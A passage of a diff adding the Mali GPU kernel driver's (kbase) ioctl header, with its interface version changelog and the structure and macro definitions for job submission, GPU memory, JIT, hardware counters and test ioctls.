+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
+/**
+ * struct kbase_ioctl_version_check - Check version compatibility between
+ * kernel and userspace
+ *
+ * @major: Major version number
+ * @minor: Minor version number
+ */
+struct kbase_ioctl_version_check {
+ __u16 major;
+ __u16 minor;
+};
+
+#define KBASE_IOCTL_VERSION_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
+
+
+/**
+ * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
+ *
+ * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
+ * @nr_atoms: Number of entries in the array
+ * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
+ */
+struct kbase_ioctl_job_submit {
+ __u64 addr;
+ __u32 nr_atoms;
+ __u32 stride;
+};
+
+#define KBASE_IOCTL_JOB_SUBMIT \
+ _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
+
+#define KBASE_IOCTL_POST_TERM \
+ _IO(KBASE_IOCTL_TYPE, 4)
+
+/**
+ * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
+ * @event: GPU address of the event which has been updated
+ * @new_status: The new status to set
+ * @flags: Flags for future expansion
+ */
+struct kbase_ioctl_soft_event_update {
+ __u64 event;
+ __u32 new_status;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
+ _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
+
+/**
+ * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
+ * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
+ * kernel
+ *
+ * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
+ * @version: Represents a breaking change in the
+ * `struct kbase_kinstr_jm_atom_state_change`
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ *
+ * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
+ * end of the structure that older user space might not understand. If the
+ * `version` is the same, the structure is still compatible with newer kernels.
+ * The `size` can be used to cast the opaque memory returned from the kernel.
+ */
+struct kbase_kinstr_jm_fd_out {
+ __u16 size;
+ __u8 version;
+ __u8 padding[5];
+};
+
+/**
+ * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
+ *
+ * @count: Number of atom states that can be stored in the kernel circular
+ * buffer. Must be a power of two
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ */
+struct kbase_kinstr_jm_fd_in {
+ __u16 count;
+ __u8 padding[6];
+};
+
+union kbase_kinstr_jm_fd {
+ struct kbase_kinstr_jm_fd_in in;
+ struct kbase_kinstr_jm_fd_out out;
+};
+
+#define KBASE_IOCTL_KINSTR_JM_FD \
+ _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
+
+
+#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
+ _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
+
+#define KBASE_IOCTL_TYPE 0x80
+
+/**
+ * struct kbase_ioctl_set_flags - Set kernel context creation flags
+ *
+ * @create_flags: Flags - see base_context_create_flags
+ */
+struct kbase_ioctl_set_flags {
+ __u32 create_flags;
+};
+
+#define KBASE_IOCTL_SET_FLAGS \
+ _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
+
+/**
+ * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
+ *
+ * @buffer: Pointer to the buffer to store properties into
+ * @size: Size of the buffer
+ * @flags: Flags - must be zero for now
+ *
+ * The ioctl will return the number of bytes stored into @buffer or an error
+ * on failure (e.g. @size is too small). If @size is specified as 0 then no
+ * data will be written but the return value will be the number of bytes needed
+ * for all the properties.
+ *
+ * @flags may be used in the future to request a different format for the
+ * buffer. With @flags == 0 the following format is used.
+ *
+ * The buffer will be filled with pairs of values, a __u32 key identifying the
+ * property followed by the value. The size of the value is identified using
+ * the bottom bits of the key. The value then immediately follows the key and
+ * is tightly packed (there is no padding). All keys and values are
+ * little-endian.
+ *
+ * 00 = __u8
+ * 01 = __u16
+ * 10 = __u32
+ * 11 = __u64
+ */
+struct kbase_ioctl_get_gpuprops {
+ __u64 buffer;
+ __u32 size;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_GET_GPUPROPS \
+ _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
+
+/**
+ * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
+ * @in: Input parameters
+ * @in.va_pages: The number of pages of virtual address space to reserve
+ * @in.commit_pages: The number of physical pages to allocate
+ * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
+ * @in.flags: Flags
+ * @out: Output parameters
+ * @out.flags: Flags
+ * @out.gpu_va: The GPU virtual address which is allocated
+ */
+union kbase_ioctl_mem_alloc {
+ struct {
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u64 flags;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALLOC \
+ _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
+
+/**
+ * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
+ * @in: Input parameters
+ * @in.gpu_addr: A GPU address contained within the region
+ * @in.query: The type of query
+ * @out: Output parameters
+ * @out.value: The result of the query
+ *
+ * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
+ */
+union kbase_ioctl_mem_query {
+ struct {
+ __u64 gpu_addr;
+ __u64 query;
+ } in;
+ struct {
+ __u64 value;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_QUERY \
+ _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
+
+#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
+#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
+#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
+
+/**
+ * struct kbase_ioctl_mem_free - Free a memory region
+ * @gpu_addr: Handle to the region to free
+ */
+struct kbase_ioctl_mem_free {
+ __u64 gpu_addr;
+};
+
+#define KBASE_IOCTL_MEM_FREE \
+ _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
+/**
+ * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
+ * @buffer_count: requested number of dumping buffers
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ *
+ * A fd is returned from the ioctl if successful, or a negative value on error
+ */
+struct kbase_ioctl_hwcnt_reader_setup {
+ __u32 buffer_count;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_READER_SETUP \
+ _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
+
+/**
+ * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
+ * @dump_buffer: GPU address to write counters to
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ */
+struct kbase_ioctl_hwcnt_enable {
+ __u64 dump_buffer;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_ENABLE \
+ _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
+
+#define KBASE_IOCTL_HWCNT_DUMP \
+ _IO(KBASE_IOCTL_TYPE, 10)
+
+#define KBASE_IOCTL_HWCNT_CLEAR \
+ _IO(KBASE_IOCTL_TYPE, 11)
+
+/**
+ * struct kbase_ioctl_hwcnt_values - Values to set the dummy counters to.
+ * @data: Counter samples for the dummy model.
+ * @size: Size of the counter sample data.
+ * @padding: Padding.
+ */
+struct kbase_ioctl_hwcnt_values {
+ __u64 data;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_HWCNT_SET \
+ _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
+
+/**
+ * struct kbase_ioctl_disjoint_query - Query the disjoint counter
+ * @counter: A counter of disjoint events in the kernel
+ */
+struct kbase_ioctl_disjoint_query {
+ __u32 counter;
+};
+
+#define KBASE_IOCTL_DISJOINT_QUERY \
+ _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
+
+/**
+ * struct kbase_ioctl_get_ddk_version - Query the kernel version
+ * @version_buffer: Buffer to receive the kernel version string
+ * @size: Size of the buffer
+ * @padding: Padding
+ *
+ * The ioctl will return the number of bytes written into version_buffer
+ * (which includes a NULL byte) or a negative error code
+ *
+ * The ioctl request code has to be _IOW because the data in ioctl struct is
+ * being copied to the kernel, even though the kernel then writes out the
+ * version info to the buffer specified in the ioctl.
+ */
+struct kbase_ioctl_get_ddk_version {
+ __u64 version_buffer;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_GET_DDK_VERSION \
+ _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 10.2--11.4)
+ * @va_pages: Number of VA pages to reserve for JIT
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_10_2 {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 11.5--11.19)
+ * @va_pages: Number of VA pages to reserve for JIT
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_11_5 {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
+
+/**
+ * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
+ * allocator
+ * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
+ * memory allocations
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ * @phys_pages: Maximum number of physical pages to allocate just-in-time
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ */
+struct kbase_ioctl_mem_jit_init {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+ __u64 phys_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
+/**
+ * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
+ *
+ * @handle: GPU memory handle (GPU VA)
+ * @user_addr: The address where it is mapped in user space
+ * @size: The number of bytes to synchronise
+ * @type: The direction to synchronise: 0 is sync to memory (clean),
+ * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero
+ */
+struct kbase_ioctl_mem_sync {
+ __u64 handle;
+ __u64 user_addr;
+ __u64 size;
+ __u8 type;
+ __u8 padding[7];
+};
+
+#define KBASE_IOCTL_MEM_SYNC \
+ _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
+
+/**
+ * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
+ *
+ * @in: Input parameters
+ * @in.gpu_addr: The GPU address of the memory region
+ * @in.cpu_addr: The CPU address to locate
+ * @in.size: A size in bytes to validate is contained within the region
+ * @out: Output parameters
+ * @out.offset: The offset from the start of the memory region to @cpu_addr
+ */
+union kbase_ioctl_mem_find_cpu_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 cpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
+
+/**
+ * struct kbase_ioctl_get_context_id - Get the kernel context ID
+ *
+ * @id: The kernel context ID
+ */
+struct kbase_ioctl_get_context_id {
+ __u32 id;
+};
+
+#define KBASE_IOCTL_GET_CONTEXT_ID \
+ _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
+
+/**
+ * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
+ *
+ * @flags: Flags
+ *
+ * The ioctl returns a file descriptor when successful
+ */
+struct kbase_ioctl_tlstream_acquire {
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
+ _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
+
+#define KBASE_IOCTL_TLSTREAM_FLUSH \
+ _IO(KBASE_IOCTL_TYPE, 19)
+
+/**
+ * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
+ *
+ * @gpu_addr: The memory region to modify
+ * @pages: The number of physical pages that should be present
+ *
+ * The ioctl may return on the following error codes or 0 for success:
+ * -ENOMEM: Out of memory
+ * -EINVAL: Invalid arguments
+ */
+struct kbase_ioctl_mem_commit {
+ __u64 gpu_addr;
+ __u64 pages;
+};
+
+#define KBASE_IOCTL_MEM_COMMIT \
+ _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
+
+/**
+ * union kbase_ioctl_mem_alias - Create an alias of memory regions
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.stride: Bytes between start of each memory region
+ * @in.nents: The number of regions to pack together into the alias
+ * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_alias {
+ struct {
+ __u64 flags;
+ __u64 stride;
+ __u64 nents;
+ __u64 aliasing_info;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_unmap - Unmap a resource which was
+ * previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+ _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
